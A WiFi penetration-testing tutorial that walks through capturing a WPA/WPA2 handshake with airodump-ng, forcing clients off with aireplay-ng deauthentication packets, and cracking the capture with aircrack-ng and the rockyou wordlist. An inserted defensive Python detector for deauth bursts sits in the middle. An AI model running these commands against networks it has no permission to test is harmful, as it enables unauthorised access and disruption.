WPA/WPA2 WiFi PenTest with Kali Linux

Kali Linux
Start your Kali Linux virtual machine.

Wireless adapter

Plug in your wireless adapter (see Wireless Adapters suitable for WiFi pen-test).

Disconnect from all wireless networks.

Enable monitor mode on wireless interface

List wireless interfaces supporting monitor mode


Enable monitor mode

airmon-ng start wlan0

Scan for WiFi networks

airodump-ng wlan0mon

Target Network
Spot your target network in the list and note down its BSSID, channel and ESSID.

Packet Capture

airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]

-c channel to listen to.
--bssid show networks matching the given bssid.
-w the dump file prefix to use

Inject packets/Capture Handshake
Watch the airodump-ng output and wait for a client to show up. Leave airodump-ng running, open a new terminal window and execute:

aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]

-0 number of deauth packets to send
-a access point router's BSSID
-c client's MAC address
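
Seen from the defending side, the deauthentication step above is a burst of 802.11 management frames that a monitoring sensor can count. The following Python code is an added example, not part of the original tutorial: it parses raw 802.11 frames (radiotap header already removed) and flags AP/client pairs hit by such a burst. The function names, the threshold of 20 frames per second and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DISASSOC, DEAUTH = 10, 12  # 802.11 management-frame subtypes

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame):
    """Parse a raw 802.11 frame (radiotap header already stripped).
    Returns (dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:  # 24-byte MAC header + 2-byte reason code
        return None
    fc = frame[0]
    version, ftype, subtype = fc & 0x3, (fc >> 2) & 0x3, fc >> 4
    if version != 0 or ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_bursts(frames, threshold=20, window=1.0):
    """frames: (timestamp_seconds, raw_bytes) tuples in time order.
    Returns (bssid, station) pairs that saw >= threshold deauth/disassoc
    frames within `window` seconds, counting both directions together."""
    recent, flagged = defaultdict(deque), set()
    for ts, raw in frames:
        parsed = parse_deauth(raw)
        if parsed is None:
            continue
        dst, src, bssid, _reason = parsed
        station = dst if src == bssid else src  # the non-AP end of the pair
        q = recent[(bssid, station)]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged.add((bssid, station))
    return sorted(flagged)

def sample_frame(subtype, dst, src, bssid, reason=7):
    """Constructed test data: a minimal management frame, not a real capture."""
    addrs = b"".join(bytes.fromhex(a.replace(":", "")) for a in (dst, src, bssid))
    return bytes([subtype << 4, 0]) + bytes(2) + addrs + bytes(2) + struct.pack("<H", reason)

AP, STA, OTHER = "02:00:00:00:00:01", "02:00:00:00:00:02", "02:00:00:00:00:03"  # constructed
SAMPLE = [(0.0, sample_frame(DEAUTH, AP, OTHER, AP, 3))]  # one ordinary client leave
SAMPLE += [(5.0 + i * 0.01, sample_frame(DEAUTH, STA, AP, AP)) for i in range(64)]
SAMPLE += [(5.7 + i * 0.01, sample_frame(DEAUTH, AP, STA, AP)) for i in range(64)]
print(detect_bursts(SAMPLE))
```

On networks with 802.11w (Protected Management Frames) negotiated, clients discard forged deauthentication frames, so a burst like this is logged without disconnecting anyone.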

Within moments you should see this message appear in the airodump-ng screen:


aircrack-ng -a2 -b [router bssid] -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap

-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID
-w wordlist/passwords list

If the password is in the wordlist, then aircrack-ng will show it like this: